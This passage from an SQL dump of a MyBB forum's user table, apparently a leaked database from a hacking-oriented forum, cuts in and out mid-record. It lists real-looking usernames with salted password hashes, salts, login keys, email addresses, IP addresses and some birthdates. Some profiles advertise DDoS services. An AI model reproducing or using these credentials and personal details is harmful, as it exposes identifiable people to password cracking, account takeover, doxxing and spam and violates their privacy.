\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_07_10.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:17;a:5:{s:4:\"acid\";i:17;s:4:\"name\";s:8:\"Reporter\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_22_36.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:6;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:7;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:8;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:10;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:11;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:12;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:15;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:16;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:18;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:19;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:21;a:1:{s:11:\"showpostbit\";i:0;}i:22;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:1;a:5:{s:4:\"atid\";i:1;s:4:\"name\";s:12:\"Contributor \";s:5:\"image\";s:60:\"inc/plugins/achivements/upload/threads_21_10_12_12_11_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showpostbit\";i:1;s:11:\"showprofile\";i:1;}}}', '191'); INSERT INTO mybb_users VALUES('288', 'PenisFlower', 'b86f28483f6c2237f1e55ed3dc41ef7d', 'q77jnalX', 'gqZC71MXau5nW146kxqINolEbjsFm9Ie6bxnVfDn7J5BLec4vs', 'aetheriast@gmail.com', '0', '', '', '', '2', '', '0', '', '1351050347', '1351052169', '1351051091', '0', '', '0', '', '', '', '10-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '216.104.36.237', '216.104.36.237', '-664263443', '-664263443', '', '770', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('54', 'Sin Cara', '60801ac7c79599c37a7fcb6793322348', 'sWrpVaXo', 'Nk6LSkDPGo64Si9DSeYeSWGdjtfptTxc3gsGpu56esGuQCK2cz', 'hasnain.raza.com@gmail.com', '91', './uploads/avatars/avatar_54.jpg?dateline=1345012579', '101|101', 'upload', '9', '', '0', 'Need custome MyBB theme, PM me.', '1344989631', '1352743603', '1352737838', '1352436330', '', '0', '', '', '', '', 'all', '[align=center][img]http://www.shrani.si/f/N/Fg/2gJfOqIS/sin-cara1.jpg[/img][/align]', '0', '0', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '16', '119.154.24.199', '173.245.62.14', '2006587591', '-1376436722', '', '135295', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '27'); INSERT INTO mybb_users VALUES('55', 'Baws', '17dec6e8f522dc095a9938c4e4311036', 'uRlM9bLV', 'dxO6ix9kLrNci1znmJ11xfLTRkNnKAJZrw9p85VsOijyr7IVdv', 'gravity-pwnage@hotmail.com', '67', '', '', '', '2', '', '0', '', '1344992773', '1347749623', '1347683950', '1347749164', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '2', '20', '98.176.49.100', '98.176.49.100', '1655714148', '1655714148', '', '11942', '1', '7', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('56', '???Emotion™', 'e82ed33e0fc8a65ee58d57f6b7761958', '56TXXHU5', 'Hkr7E4vnuNtSgVSvi6PRc2cx9AAIFh8mP6cP3ZOau6S7O1v9KE', 'thedarkangel1398@yahoo.com', '2', '', '', '', '2', '', '0', '', '1344993267', '1344994789', '1344993267', '1344994613', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '98.86.145.224', '98.86.145.224', '1649840608', '1649840608', '', '1522', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('57', 'Kasane', 'cd633811f9988b486835f723f905b042', 'pXSwwV9X', '2XPYIeeQmR77tkAxjAYWLhpkA8v9obYSCLvS8yCk7n8v7HEkuD', 'waffles@seymour.butts', '1', '', '', '', '2', '', '0', '', '1344993351', '1344995350', '1344993803', '1344993791', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '85.69.208.130', '74.120.13.132', '1430638722', '1249381764', '', '452', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('62', 'R?????zo?', 'ec6b9e4f16ea52bb23a194754a9ff60b', 'EoT1ofId', 'BsuHf3Hq1HpUZ27NLw4RC1VepK3evfLqq51jSmNiWmpWaCatdZ', 'ze_guna@hotmail.com', '514', './uploads/avatars/avatar_62.png?dateline=1349812233', '100|100', 'upload', '9', '13,17,20,21', '13', 'Unique Leader', '1345063471', '1352758538', '1352673532', '1352620787', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/xr9Xv.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '31', '94.132.244.168', '173.245.49.14', '1585771688', '-1376440050', '', '320320', '1', '92', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:14:{i:22;a:5:{s:4:\"acid\";i:22;s:4:\"name\";s:8:\"GFX Guru\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_57_04.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:26;a:5:{s:4:\"acid\";i:26;s:4:\"name\";s:6:\"Sticky\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_2_44_39.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:16;a:5:{s:4:\"acid\";i:16;s:4:\"name\";s:10:\"Gold Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:25;a:5:{s:4:\"acid\";i:25;s:4:\"name\";s:7:\"Diamond\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_1_48_27.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}i:7;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:5:{s:4:\"apid\";i:2;s:4:\"name\";s:13:\"Posting Freak\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/posts_21_10_12_12_30_32.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '59'); INSERT INTO mybb_users VALUES('61', 'NXK', '13f219a9ece7422df37498c24b008907', 'iS7FKSlV', 'ed5iZlX7yxl5z75EbTuczHcYHkfgwY2ZGwC5NzmheMygCkIAun', 'vod246@hotmail.com', '308', './uploads/avatars/avatar_61.jpg?dateline=1345503667', '120|115', 'upload', '4', '9,17,13', '0', 'Need help? PM me. ', '1345060919', '1352738381', '1352725309', '1352578135', '', '0', '', '', '', '', 'all', '[align=center][img]http://i.imgur.com/SSlBX.gif[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '1', '27', '99.253.65.17', '99.252.235.12', '1677541649', '1677519628', '', '516747', '1', '180', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:10:{i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:8;a:5:{s:4:\"acid\";i:8;s:4:\"name\";s:5:\"Angel\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_05_53.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:7;a:5:{s:4:\"acid\";i:7;s:4:\"name\";s:21:\"Dangerous Programmer \";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_04_38.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:14;a:5:{s:4:\"acid\";i:14;s:4:\"name\";s:4:\"Swag\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_16_33.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:2:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showpostbit\";i:0;}}}', '31'); INSERT INTO mybb_users VALUES('60', 'Linux', '55db2f20ac9caa03364875c6efd59a0a', 'fTUYc7mr', 'cSiZM3rf1DfeyDdG5vTmUtOrwRbhMfGtMkjqKyPSevU5VyYYFf', 'marinacutiee@gmail.com', '3', '', '', '', '2', '', '0', '', '1345059649', '1345225764', '1345217347', '1345224837', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '117.216.4.58', '117.217.209.184', '1977091130', '1977209272', '', '5604', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('63', 't3chie', 'bd698e6cf404916aee7576b2868e3b0b', 'MslRm8Lk', 'ctaKFnhbiPKkTmPxk9Kw8teL8pteWGayNPB9Ge3iMndMq1peVw', 'gobi20_1111@hotmail.com', '0', '', '', '', '14', '', '0', '', '1345102325', '1345102421', '1345102325', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '0', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '174.91.133.199', '174.91.133.199', '-1369733689', '-1369733689', '', '96', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('64', 'vlajke', '02d8fde15011ab2c23c04b4d7cc0d796', 'eXbMiLeJ', 'iZM9e8zrkKLR2nbW3nxCHv4JexTUSehHUDUqeNa96cGMo3aLAi', 'cvejicvladimir@gmail.com', '5', '', '', '', '2', '', '0', '', '1345104218', '1345811920', '1345740751', '1345502587', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '178.223.56.85', '93.87.231.108', '-1293993899', '1566041964', '', '5496', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('67', 'HoverCatz', 'ee59071a8ec22f59fcd6ad126dd05a16', 'WyFhDyMZ', 'hCaqlXasxhljtMiERxfDl4QywHDSQyEUlzCzRjur539gVoNBFw', 'kristoffergo1@hotmail.com', '116', './uploads/avatars/avatar_67.png?dateline=1345135078', '120|150', 'upload', '9', '12,20,21', '20', '6GB DDoS', '1345127387', '1352708901', '1352486499', '1352486494', 'http://ibooter.org', '0', '', '', '', '25-3-1984', 'age', '[img]https://dl.dropbox.com/u/33062220/newsig.png[/img]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**$%%$5**Old Messages', '', '0', '2', '15', '85.165.36.95', '193.161.89.202', '1436886111', '-1046390326', '', '132436', '1', '119', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:8:{i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:5:{s:4:\"acid\";i:4;s:4:\"name\";s:14:\"Fav mod donate\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_00_20.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:6;a:1:{s:11:\"showprofile\";i:0;}i:7;a:1:{s:11:\"showprofile\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showprofile\";i:0;}i:2;a:1:{s:11:\"showprofile\";i:0;}}}', '9'); INSERT INTO mybb_users VALUES('71', 'Manchester', '1b9ac3ca779b0a0f0cd9115ca83c4d89', 'jKyf2DWL', 'DybSa3Nmj9UpjxYxybhIIk1BHfoUvzOaTKT9F9bNlo2KfE6E4B', 'Cooper6Shop@gmail.com', '0', '', '', '', '2', '', '0', '', '1345241059', '1345242792', '1345241540', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '71.60.105.178', '71.60.105.178', '1195141554', '1195141554', '', '483', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('70', 'Oqud™', '9d26e541776f26fce33fe8db11ff339e', 'gFwcGDoA', 'J5LdzZMfS4ahuOvChvG3TWNqALuEaPJ9Jbx5Ifwj9NeB1vmsVt', 'hides@hotmail.com', '0', '', '', '', '2', '', '0', '', '1343932555', '1348018259', '1345220015', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '76.69.98.41', '72.231.24.165', '1279615529', '1223104677', '', '485', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('72', 'Quietus2', '6880c0c959742c90fc1afd55a2613180', 'dKHPbdU3', 'SMEZvPJ1dZMGREwCoqK1ntLrYV8nkjuSML8NkfMyHkjg4Psuvy', 'njulijus@gmail.com', '1', 'http://www.avatarsdb.com/avatars/destiny_anime.gif?dateline=1345048971?dateline=1345244324', '100|100', 'remote', '2', '', '0', '', '1345243175', '1345299535', '1345244456', '1345244215', '', '0', '', '', '', '', 'all', '[img]http://img233.imageshack.us/img233/821/2616.png[/img]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '54', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.58.52.147', '78.58.52.147', '1312437395', '1312437395', '', '1293', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('84', 'Thunder™', 'ac201dc16f6b61ce7c225e3fee01b7aa', 'rtfTVNDF', 'TXJCuCQh3LVnNoTmJdVTCyoargz9eGu9sKd6MhCnnGJC3luw4U', 'cscznoob@gmail.com', '28', '', '', '', '2', '', '0', '', '1345524754', '1352133647', '1352133646', '1352013443', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '5.5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '13', '111.91.75.129', '111.91.95.12', '1868254081', '1868259084', '', '14582', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '9'); INSERT INTO mybb_users VALUES('87', 'Hostpro', '615ab47481eddeb1ffdacd7533c601e2', 'Y5L5rKuV', 'u8TbJSMpRtI1PcxAXIxtLzdDCbIOMFZxyFWgkvjIIFOymG7R5e', 'liamgordon1@live.com', '1', '', '', '', '10', '', '0', '', '1345577127', '1347284487', '1347284487', '1345631532', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '2', '0', '90.221.178.182', '90.204.128.185', '1524478646', '1523351737', '', '775', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('90', 'duhuh', '046bf6203eb79d6e115f86e7aeca9100', 'SKY2jM1T', 'FNHqJ86b7wjOSUeMX9bdTkOabxdbBrfuq4LbWWliZSIINhgq16', 'jackdh@hotmail.co.uk', '20', '', '', '', '2', '', '0', '', '1345594226', '1351214977', '1349216094', '1347214058', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '3', '216.172.135.73', '161.73.47.173', '-659781815', '-1589039187', '', '6422', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '4'); INSERT INTO mybb_users VALUES('91', 'ßÏØ‡HÂŽÂRЙ', '563d0a7ae88fbfe268849411c7028d9c', 'I2Oolfv2', 'UgYhH6ePJvscrWzNxfzn5QgBKorY44pfpDaphV1ETjudg1WgRy', 'dbc.bio@aol.com', '0', '', '', '', '2', '', '0', '', '1345596642', '1345596642', '1345596642', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '174.50.108.181', '', '-1372427083', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('97', 'Spetsnaz', '8f78e1406e3906f3fb3a5720e241c0f2', 'wvDupsVf', 'nOuqyDfKkQBihQPathxiZLiccimZTIgKtkGGjKrYfRNUGPYHT5', 'TheSpetsnaz@Hotmail.com', '0', '', '', '', '2', '', '0', '', '1345640081', '1345640391', '1345640081', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '70.173.58.33', '70.173.58.33', '1185757729', '1185757729', '', '310', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('100', '??zg???g????61', '631b07a4b18f17eec830ac79bdb9788a', '8WXUJb7Z', 'kcU3OEhC5L4iuCGDERsCCpfBiGIKlXVmBfKsblmOe7D4ksuZEZ', 'gavmaster123@gmail.com', '176', './uploads/avatars/avatar_100.jpg?dateline=1349049880', '120|138', 'upload', '9', '20,13', '20', 'DDoS\'ing like a pro ;D', '1345677377', '1352759375', '1352743454', '1352517538', '', '0', '', '', '', '', 'all', '[align=center][url=http://l33thacking.net/thread-398.html][img]http://i.imgur.com/b6ooB.gif[/img][/url][/align]\r\n\r\n[align=center]\r\n[color=#87CEFA]PSN: [/color][color=#1E90FF]WHO_DAT_GYPSY[/color][/align]\r\n\r\n', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '62', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '15', '70.16.221.26', '173.245.52.14', '1175510298', '-1376439282', '', '148332', '1', '71', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:3:{s:4:\"acid\";a:2:{i:16;a:5:{s:4:\"acid\";i:16;s:4:\"name\";s:10:\"Gold Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '17'); INSERT INTO mybb_users VALUES('214', 'Rave™', 'ffb03f97ffd602f4a0c9f50d1c3eb3d0', 'Nnl2fTTH', 'zJXWFc16VGNykuYSBWRb3NRyzRkai686wccNpzGoXWRtaF3tX3', 'theogforums@gmail.com', '51', './uploads/avatars/avatar_214.png?dateline=1349659342', '87|150', 'upload', '14', '', '0', '', '1349220032', '1351375580', '1351293619', '1350937597', '', '0', '', '', '', '2-2-1980', 'all', '[align=center][img]http://i.imgur.com/90BIF.png[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '71.67.179.16', '71.72.242.232', '1195619088', '1195963112', '', '29456', '1', '2', '0', '50', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 